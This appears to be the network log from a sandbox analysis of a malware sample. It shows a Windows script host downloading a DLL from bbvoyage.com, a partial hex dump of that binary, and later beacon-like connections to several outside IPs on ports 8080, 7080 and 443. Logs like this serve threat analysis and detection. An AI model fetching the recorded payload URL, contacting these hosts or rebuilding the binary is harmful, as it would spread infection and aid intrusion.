                                                                                                        Mar 17, 2023 16:45:08.620536089 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.620596886 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.620691061 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.621372938 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.621392012 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.765981913 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.766369104 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.775221109 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.775259018 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.775733948 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.860647917 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.990123987 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:08.990169048 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144403934 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144468069 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144488096 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144537926 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144562960 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144586086 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144675016 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.144701004 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.144767046 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.144767046 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.145137072 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.145200014 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.145242929 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.145252943 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.145276070 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.145301104 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.205825090 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.205914021 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206078053 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206114054 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206151962 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206186056 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206362009 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206432104 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206474066 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206490040 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206553936 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206584930 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206799030 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206854105 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206897020 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206912994 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.206939936 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.206960917 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.268136978 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268201113 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268399954 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268448114 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.268491030 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268520117 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.268574953 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.268690109 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268754005 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268825054 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.268850088 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.268870115 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.269124985 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269188881 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269229889 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.269258022 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269301891 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.269695044 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269738913 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269815922 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.269840956 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.269856930 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.270301104 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.270356894 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.270431042 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.270456076 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.270476103 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.315396070 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.326381922 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.326453924 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.326704979 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.326731920 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.326812983 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.329727888 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.329816103 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.329895020 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.329917908 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330030918 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330132008 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330205917 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330245018 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330269098 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330341101 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330369949 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330538988 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330601931 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330682039 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330722094 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.330764055 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330827951 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.330925941 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331001997 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331023932 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331033945 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331110954 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331201077 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331267118 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331307888 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331317902 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331367016 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331511974 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331511021 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331553936 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331608057 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331614971 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331686020 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331696987 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331751108 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331861973 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331924915 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.331954002 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.331964970 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.332078934 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.332119942 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.332138062 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.332158089 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.332268000 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.332339048 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.333110094 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.337249041 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.337280989 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:09.337301016 CET49697443192.168.2.431.31.196.172
                                                                                                        Mar 17, 2023 16:45:09.337310076 CET4434969731.31.196.172192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.322318077 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:48.350121021 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.350270033 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:48.353463888 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:48.380976915 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.403207064 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.403243065 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.403414011 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:48.407522917 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:48.436115980 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:48.490400076 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:50.124090910 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:50.124151945 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:50.151853085 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:52.452487946 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:52.507344961 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:55.453619957 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:55.453682899 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:55.453790903 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:55.453957081 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:55.454005957 CET496988080192.168.2.491.121.146.47
                                                                                                        Mar 17, 2023 16:45:55.481270075 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:55.481311083 CET80804969891.121.146.47192.168.2.4
                                                                                                        Mar 17, 2023 16:45:57.481213093 CET497007080192.168.2.466.228.32.31
                                                                                                        Mar 17, 2023 16:45:57.580888987 CET70804970066.228.32.31192.168.2.4
                                                                                                        Mar 17, 2023 16:45:58.085016966 CET497007080192.168.2.466.228.32.31
                                                                                                        Mar 17, 2023 16:45:58.184554100 CET70804970066.228.32.31192.168.2.4
                                                                                                        Mar 17, 2023 16:45:58.694374084 CET497007080192.168.2.466.228.32.31
                                                                                                        Mar 17, 2023 16:45:58.794015884 CET70804970066.228.32.31192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.229854107 CET49701443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.229942083 CET44349701182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.230302095 CET49701443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.230806112 CET49701443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.230843067 CET44349701182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.479733944 CET44349701182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.483053923 CET49702443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.483145952 CET44349702182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.483230114 CET49702443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.484050035 CET49702443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.484088898 CET44349702182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.744923115 CET44349702182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.747956038 CET49703443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.748014927 CET44349703182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.748158932 CET49703443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.748759031 CET49703443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.748784065 CET44349703182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.995677948 CET44349703182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.996740103 CET49704443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.996803045 CET44349704182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:04.996988058 CET49704443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.997924089 CET49704443192.168.2.4182.162.143.56
                                                                                                        Mar 17, 2023 16:46:04.997948885 CET44349704182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:05.249885082 CET44349704182.162.143.56192.168.2.4
                                                                                                        Mar 17, 2023 16:46:10.739428043 CET4970580192.168.2.4187.63.160.88
                                                                                                        Mar 17, 2023 16:46:10.969451904 CET8049705187.63.160.88192.168.2.4
                                                                                                        Mar 17, 2023 16:46:11.473587990 CET4970580192.168.2.4187.63.160.88
                                                                                                        Mar 17, 2023 16:46:11.703495979 CET8049705187.63.160.88192.168.2.4
                                                                                                        Mar 17, 2023 16:46:12.206967115 CET4970580192.168.2.4187.63.160.88
                                                                                                        Mar 17, 2023 16:46:12.436692953 CET8049705187.63.160.88192.168.2.4
                                                                                                        Mar 17, 2023 16:46:17.940893888 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.109103918 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:18.109304905 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.119648933 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.287630081 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:18.297807932 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:18.297851086 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:18.297949076 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.304048061 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.472188950 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:18.473232031 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:18.683547020 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:19.304419041 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:19.356933117 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:22.302872896 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:22.302988052 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:22.303273916 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:22.303323030 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:22.303420067 CET497068080192.168.2.4167.172.199.165
                                                                                                        Mar 17, 2023 16:46:22.471144915 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:22.471210003 CET808049706167.172.199.165192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.182365894 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.182455063 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.182620049 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.183110952 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.183145046 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.316459894 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.316668034 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.319436073 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.319493055 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.319902897 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.321810007 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.321855068 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.567342997 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.567569017 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.567749977 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.570744038 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.570744038 CET49707443192.168.2.4164.90.222.65
                                                                                                        Mar 17, 2023 16:46:23.570806026 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:23.570835114 CET44349707164.90.222.65192.168.2.4
                                                                                                        Mar 17, 2023 16:46:27.711698055 CET497088080192.168.2.4104.168.155.143
                                                                                                        Mar 17, 2023 16:46:27.876749039 CET808049708104.168.155.143192.168.2.4
                                                                                                        Mar 17, 2023 16:46:28.388963938 CET497088080192.168.2.4104.168.155.143
                                                                                                        Mar 17, 2023 16:46:28.553769112 CET808049708104.168.155.143192.168.2.4
                                                                                                        Mar 17, 2023 16:46:29.060875893 CET497088080192.168.2.4104.168.155.143
                                                                                                        Mar 17, 2023 16:46:29.225800037 CET808049708104.168.155.143192.168.2.4
                                                                                                        Mar 17, 2023 16:46:34.678606987 CET497098080192.168.2.4163.44.196.120
                                                                                                        Mar 17, 2023 16:46:34.893295050 CET808049709163.44.196.120192.168.2.4
                                                                                                        Mar 17, 2023 16:46:35.405194044 CET497098080192.168.2.4163.44.196.120
                                                                                                        Mar 17, 2023 16:46:35.619859934 CET808049709163.44.196.120192.168.2.4
                                                                                                        Mar 17, 2023 16:46:36.123945951 CET497098080192.168.2.4163.44.196.120
                                                                                                        Mar 17, 2023 16:46:36.338505983 CET808049709163.44.196.120192.168.2.4
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Mar 17, 2023 16:44:36.607157946 CET5968353192.168.2.48.8.8.8
                                                                                                        Mar 17, 2023 16:44:36.906600952 CET53596838.8.8.8192.168.2.4
                                                                                                        Mar 17, 2023 16:45:08.546230078 CET6416753192.168.2.48.8.8.8
                                                                                                        Mar 17, 2023 16:45:08.616631985 CET53641678.8.8.8192.168.2.4
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Mar 17, 2023 16:44:36.607157946 CET192.168.2.48.8.8.80xf2a7Standard query (0)penshorn.orgA (IP address)IN (0x0001)false
                                                                                                        Mar 17, 2023 16:45:08.546230078 CET192.168.2.48.8.8.80x46a1Standard query (0)bbvoyage.comA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Mar 17, 2023 16:44:36.906600952 CET8.8.8.8192.168.2.40xf2a7No error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
                                                                                                        Mar 17, 2023 16:45:08.616631985 CET8.8.8.8192.168.2.40x46a1No error (0)bbvoyage.com31.31.196.172A (IP address)IN (0x0001)false
                                                                                                        • bbvoyage.com
                                                                                                        • 164.90.222.65
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.44969731.31.196.172443C:\Windows\SysWOW64\wscript.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2023-03-17 15:45:08 UTC0OUTGET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: bbvoyage.com
                                                                                                        2023-03-17 15:45:09 UTC0INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Fri, 17 Mar 2023 15:45:09 GMT
                                                                                                        Content-Type: application/x-msdownload
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        X-Powered-By: PHP/7.1.18
                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Fri, 17 Mar 2023 15:45:09 GMT
                                                                                                        Content-Disposition: attachment; filename="S5wgTTI5V4xIKl90.dll"
                                                                                                        Content-Transfer-Encoding: binary
                                                                                                        Set-Cookie: 64148b050ffab=1679067909; expires=Fri, 17-Mar-2023 15:46:09 GMT; Max-Age=60; path=/
                                                                                                        Last-Modified: Fri, 17 Mar 2023 15:45:09 GMT
                                                                                                        Strict-Transport-Security: max-age=31536000;
                                                                                                        2023-03-17 15:45:09 UTC0INData Raw: 66 64 63 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
                                                                                                        Data Ascii: fdc0MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
                                                                                                        2023-03-17 15:45:09 UTC16INData Raw: 20 80 79 08 00 4c 8b f2 48 8b f1 74 4c 48 8b 01 48 85 c0 74 44 48 83 cf ff 48 ff c7 80 3c 38 00 75 f7 48 8d 4f 01 e8 99 24 00 00 48 8b d8 48 85 c0 74 1c 4c 8b 06 48 8d 57 01 48 8b c8 e8 8a 24 00 00 48 8b c3 41 c6 46 08 01 49 89 06 33 db 48 8b cb e8 01 24 00 00 eb 0a 48 8b 01 48 89 02 c6 42 08 00 48 8b 5c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc cc 40 53 48 83 ec 20 80 79 08 00 48 8b d9 74 08 48 8b 09 e8 c5 23 00 00 48 83 23 00 c6 43 08 00 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 50 48 8b da 48 8b f1 bf 20 05 93 19 48 85 d2 74 1d f6 02 10 74 18 48 8b 09 48 83 e9 08 48 8b 01 48 8b 58 30 48 8b 40 40 ff 15 d4 18 01 00 48 8d 54 24 20 48 8b cb ff 15 26 17 01 00 48 89 44 24 20 48 85 db 74 0f f6 03 08 75 05 48 85
                                                                                                        Data Ascii: yLHtLHHtDHH<8uHO$HHtLHWH$HAFI3H$HHBH\$0Ht$8H|$@H A^@SH yHtH#H#CH [H\$Ht$ WHPHH HttHHHHX0H@@HT$ H&HD$ HtuH
                                                                                                        2023-03-17 15:45:09 UTC32INData Raw: e8 cb fd ff ff 44 88 73 28 b9 01 00 00 00 e8 f5 2a 00 00 48 89 43 10 49 8b d6 48 f7 d8 1b c0 f7 d0 83 e0 0c 0f 94 c2 85 c0 0f 94 c1 88 4b 28 48 89 53 18 85 c0 0f 85 d1 00 00 00 48 8b 43 10 44 88 30 eb 9d 4c 89 74 24 38 41 83 c9 ff 4c 89 74 24 30 4c 8b c7 44 89 74 24 28 33 d2 8b cd 4c 89 74 24 20 e8 30 17 00 00 48 63 f0 85 c0 75 19 ff 15 87 d6 00 00 8b c8 e8 30 fc ff ff e8 b7 fc ff ff 8b 00 e9 84 00 00 00 48 8b 53 18 48 3b f2 76 40 44 38 73 28 74 0d 48 8b 4b 10 e8 30 fd ff ff 44 88 73 28 48 8b ce e8 5c 2a 00 00 48 89 43 10 49 8b d6 48 f7 d8 1b c0 f7 d0 83 e0 0c 48 0f 44 d6 85 c0 0f 94 c1 88 4b 28 48 89 53 18 85 c0 75 3b 48 8b 43 10 41 83 c9 ff 4c 89 74 24 38 4c 8b c7 4c 89 74 24 30 8b cd 89 54 24 28 33 d2 48 89 44 24 20 e8 a0 16 00 00 48 98 48 85 c0 0f 84
                                                                                                        Data Ascii: Ds(*HCIHK(HSHCD0Lt$8ALt$0LDt$(3Lt$ 0Hcu0HSH;v@D8s(tHK0Ds(H\*HCIHHDK(HSu;HCALt$8LLt$0T$(3HD$ HH
